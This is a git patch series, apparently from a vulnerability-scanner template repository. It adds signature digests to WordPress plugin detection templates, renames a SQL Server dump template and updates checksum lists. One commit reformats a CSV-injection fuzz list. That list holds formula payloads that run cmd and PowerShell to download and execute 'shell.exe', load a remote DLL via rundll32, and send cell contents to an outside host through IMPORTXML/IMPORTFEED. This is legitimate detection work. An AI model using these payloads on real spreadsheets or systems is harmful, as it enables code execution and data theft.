4a0a0047304502202ce99bb13ba10910b6f7a99f917748408a91df87f4008af6d1a6dbc71c635c6b022100babe79c89f6fcb8d71edd21e6f4268bd11ae7225aa4cf75212524173fbbed614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..f7520e6e45 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220373448dbd1b8f3857b4f7a8882c606917f6512c7291eb1942d29f6fe8ab2b002022100d077ddcb0028bc9ce3d9bfe0daccafba5a19b7549ab022fdb280127f3cf4cad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..1e9d6f81ef 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220090101b90ced0a92cb53a10923a8492ea7162097074e30428741852798191006022039e8c6783242dbef266a41ac9829b3ab41b44d2b999d857f098acc7fa8138df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..40daf41c8a 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069c6ae21de775708fd508f096dcefb0ed8236e429970b0cf43b156d4f67875cc022075e0147dec3909af8e621c38ef31d1da7d87d45eee0c450b907eb2fe4dd40dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..7ec77d0e4f 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f86f12a25f2768d32e3036f0890fd240a8c31ee35548277e15eb57befa81a3b9022100958465b84f00fb7f02f027fc214a830964337ce92a58ad08b91079b254e836d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..5747febceb 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa8dc5227635d0921f1f2c2b432d691be918b734d0f1c121371cab391641514a02206b10ad86fe2ff90b54f530a8cd498757685bdb415a40f4e2243a4ee52dbfb1c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..b072f35fdc 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcc45468cfd5a574214955c26d84fb6b302764fb67c4906bdb54dc264d3a9023022100c573eda08aca8ba1c0d1f5b78d1765ad8566d239396dab0dc6d6ae32c8a57ee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..b72386b44e 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2c48ade63390bab9f9853b2c32a564f2a0ce633d5ce1eac468bfcd8b117e8d5022056e6542b9edc86233c6adcab9ec7f516703fa892500f878221c75b88094ba3d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..fb9047b36d 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ec9027dde011d1c7d68df184bfe1443ee5587802d5e679b8a504f238639672c0220054981901d15640a4a5c32330f60f89fc56e53b3c2601ae23db154ccb0723633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..039c9c1731 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d49ace635c840304ef04be9821a9a305470f700a7deb5d0be5f8bf2b9d02e99f02207be714cf766270c0dc57927f0d89aa605131b38012209f9a9786fa287f27cb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..802369095f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b26daa0e783e18aeb7e20500459175f0efc56c667e41cc7d21fcd632a4908c5902204fa48a0bc915ea9196114b52a319d55e10ed3c08d7e5acf36176c8f140c9ecfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..eb3326fe73 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0e85685596e92f2e889050c9d362eb944d5b841935e0484f4ace2da2799421802204f2cf2f89e5d93f72a58ed637abbd82d4f9e33a833718ebc22cdbe4a3661a2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..26230a85e0 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090dccaa9ca559a51c5c516de47701606b719216b56d2e73a3d7b38541c1eafd7022100cb2960b687755daf7eb8264d683002aad2e77faa2ae1e4b3dc066b4bbd2f8c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..476eaeaedc 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ebd54db67a03ab5598233eadc73407df023ee63d17de32e3185c3479ede7a12022100b3acf8fbd2fe6571f23edce345c5e5272c01129f29138f2d926b453bad141613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..35081b2f09 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f17087a67f68bee833999ff4ad4cf5a5cd03c385bd18ca37154be7453a8aac502201b194493c10932d4053e821139443347eb144bedafd74cc2f85e259b8cb1f631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..433309e350 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a0ff93b70db42aa8877ef30d5650ac8a967090f77a00ce2de778653f6186397b02205a74cab8814649fe2f4d667624fc7ee03a3b74be697f37b68f1f48681aad00dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..8f122c84ce 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008353b60c7830d9c53bcecbd0f147561fd0863ac193bc1fa1f5194fdf97cb1fc302207aaf0c9cab1084c65976028c2ec7f1c4ee4904e0081a42f7b899c48045c4ce8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e11185daa9 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f30601773989ca20ba35670148574405a0f6aad2e2663161f4666f6d5227f9b022039403fe0ccebb31c9833ba6d6f8bd90a0a2ce82f539305b9cc9d4351e7fdc2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..aa9584f15d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004ed82f694e456832ffa0163a4d4fac8660b211bb32dda8a94ca9d914a79ac2402204f58d1ec5397cb0e7c069180814e2d9820414ae61fae4be4654695a2fb6b1160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..2d94a6d566 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c1f0a2313b5755229bc4ab48b36231be887eddd99f464e2a3a4c6b67efaad1602206b22f0030f19619821b2eb758773f2285410c7831211b546cca40c9d4499c9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..7186ea947d 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a94aa5c38b23ac125c4788839fb2eb8af33fac15e747a0d2e857c6d8a19c54a6022100b5511751fabeefdf8f2157db62315db44a8e71c9292d34447c6118ec90713930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..89b02023c5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027956bc9efa1196c03bfb2bded197064bff9a456c0cfe98f53bf3e7cc1c933970220356f7adc492a260661a1f5eed0c771fe8f2604597da4b9939809872d2e56b33c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..5f99405262 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201826b090cd922e29e009382eb32c56570d619bd24c2a9861648cdff47815543e0220679ef8bbc847a20df24323c373b36ba81f29ba5c73178b49d6698efce75bf394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..8725b18ca9 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d5d9f7875c8affecfdf9393a7e20795b4584198fa6083fdb1551aa817e9fd68022037bea5fb1b2d733d25ead30bd6c28945a18ea77281a98cf90e486064b4299a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..2afae53c86 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029199a785f6429b8feeaeb10e28eb0a40ead6249bc933ee042d96f7000f222a9022100d5612e70c11166f87a0efc6f192a3fff3ecb5ea999294e41df0a68b45ef40f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..3166852e10 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dfd4d141883ee2ed3b4d386d5be43b7cf43b09e610ecacf3e236c653a0e46d24022002ab9d1e96445fe86be536c661023792a391df9c8e7a4bbbbf260fabf2bb2b28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 574b157bf24c29600b2f2a3f6e026f5af4e37ee6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Jul 2024 09:44:48 +0530 Subject: [PATCH 0796/1841] minor update --- dast/vulnerabilities/csv-injection.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml index f81f152197..ef78742b57 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/csv-injection.yaml @@ -16,13 +16,13 @@ http: payloads: csv_fuzz: - - 'class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}' + - "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}" - 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0' - - '@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0' - - '=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0' - - '=cmd|' /C nslookup{{interactsh-url}}'!'A1'' - - '=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0' - - '=cmd|'/c rundll32.exe \\{{interactsh-url}}\3\2\1.dll,0'!_xlbgnm.A1' + - "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0" + - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0" + - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'" + - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0" + - "=cmd|'/c rundll32.exe \\{{interactsh-url}}\3\2\1.dll,0'!_xlbgnm.A1" - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' From bd1c10ca047d50630c7d86f72a1805fc5bb28111 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Jul 2024 15:25:15 +0530 Subject: [PATCH 0797/1841] minor update --- http/exposures/backups/sql-server-dump.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml index 6295f4c4cb..3de7cceaa8 100644 --- a/http/exposures/backups/sql-server-dump.yaml +++ b/http/exposures/backups/sql-server-dump.yaml @@ -1,10 +1,11 @@ -id: default-sql-server-dump +id: sql-server-dump info: name: SQL Server - Dump Files author: userdehghani severity: medium - description: A SQL Server dump file was found + description: | + A SQL Server dump file was found classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -50,9 +51,9 @@ http: matchers-condition: and matchers: - type: binary + part: body binary: - "54415045" # Microsoft Tape Format - part: body - type: status status: From 804b104d639f1d11c5dfeef8b53b258294c9a5ed Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 09:58:28 +0000 Subject: [PATCH 0798/1841] Auto Generated New Template Addition List [Tue Jul 2 09:58:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ad3198f992..4e1f098d74 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/default-logins/jeedom/jeedom-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml http/exposed-panels/endpoint-protector-panel.yaml +http/exposures/backups/sql-server-dump.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml http/misconfiguration/forgejo-repo-exposure.yaml From 7dcef5d8cc6a1232cb6d89e88ef0b044ed758326 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 09:58:35 +0000 Subject: [PATCH 0799/1841] Auto Generated Templates Checksum [Tue Jul 2 09:58:35 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b6a48e3521..fc345326ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3963,7 +3963,7 @@ http/exposed-panels/emessage-panel.yaml:0f52f7a8f6b5a3b897f9dcee5102c76fdf44c05f http/exposed-panels/emqx-panel.yaml:7dc0f672d8eb1afd33f03d9259c806e59400fd89 http/exposed-panels/ems-login-panel.yaml:7425e45058fd144c1b7d4b96aa398a7ce2adf54f http/exposed-panels/ems-webclient-panel.yaml:22100541a984199b437cc22a3c9ea0647efdd224 -http/exposed-panels/endpoint-protector-panel.yaml:ba4ae20faf620f47cef6250249075190fadacf61 +http/exposed-panels/endpoint-protector-panel.yaml:adbdc4611d847392ce5c9e1129b8e25ce6290726 http/exposed-panels/entrust-identityguard.yaml:1f4f1d52172e9b6450b8a1fceb92c738ea82a3bc http/exposed-panels/eos-http-browser.yaml:dcc754f052324696c7fb1d6af12d94dbe6faa072 http/exposed-panels/episerver-panel.yaml:2d2a42e674cfc5eaabb9e0044859e70856578be2 @@ -4798,6 +4798,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce +http/exposures/backups/sql-server-dump.yaml:997c812c99f8659aad23a107014b5a6b7c63b2d6 http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 @@ -7235,228 +7236,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:c54773933fdcfb49dbf7ba37f9e1fc2db61329b9 +http/technologies/wordpress/plugins/add-to-any.yaml:eaecc5943e78b6bfd7f9694316a161ba3f66b860 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:54cc5f9c1cc6247945805f518a489436fedd7a65 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:7aae85203251bb0f3494157df3eab53676666a2a +http/technologies/wordpress/plugins/akismet.yaml:5455e09020dd300aeabf17c3be38c8eca843865c http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:81928069f6af1766f8b493be300abc29f5bed07c +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4c5f300d2a8e769a4405634001605c580aaf582e +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:1e96ef96febb08fc1ca690e54c4a6632e417d077 +http/technologies/wordpress/plugins/amp.yaml:6d02179c58b20f4d8ad9285e6fb99d7852ecfa17 +http/technologies/wordpress/plugins/antispam-bee.yaml:b9a0de1422ef2e13b3026401a0ea0d301f308993 +http/technologies/wordpress/plugins/astra-sites.yaml:fb5ef40ea3d9c5b55ef65c01aab287aadf6c1b54 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:b1b500e8f5d50f192a8b06d3159fb94b18906532 +http/technologies/wordpress/plugins/backwpup.yaml:be1af754a2c8fd3b91bfecbc48767f0a2ff180ea +http/technologies/wordpress/plugins/better-search-replace.yaml:f0ad7bce917360394d9f883930cdd2d27549241e +http/technologies/wordpress/plugins/better-wp-security.yaml:d0e92fae13c4c9f95f2a7d16846baed127ef9690 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:69417b2807cf59d63c67de08b92b320f85e47f1f +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:2fa2b1b3241c6ca8ce134fabbd8b207b6d3c3775 +http/technologies/wordpress/plugins/breeze.yaml:4ec57e4fefec2c9b4c398f412db5ca59a7015d65 +http/technologies/wordpress/plugins/broken-link-checker.yaml:f78828b3fbb4b4226562e6d7acd6a227dd7b2443 +http/technologies/wordpress/plugins/chaty.yaml:864504fa235a453bc49bd7a711f832755bf8f309 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2626556f7142916089ab0b120beaa9c3cc302cf0 +http/technologies/wordpress/plugins/classic-editor.yaml:03e4778a0834f0bcfe63538f65f3c6835aa43b40 +http/technologies/wordpress/plugins/classic-widgets.yaml:9598bb931c11c9e4714437ad9b41f448d1579f5f +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:35347f72288514982d3c41a085b9bca7f4d613c4 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 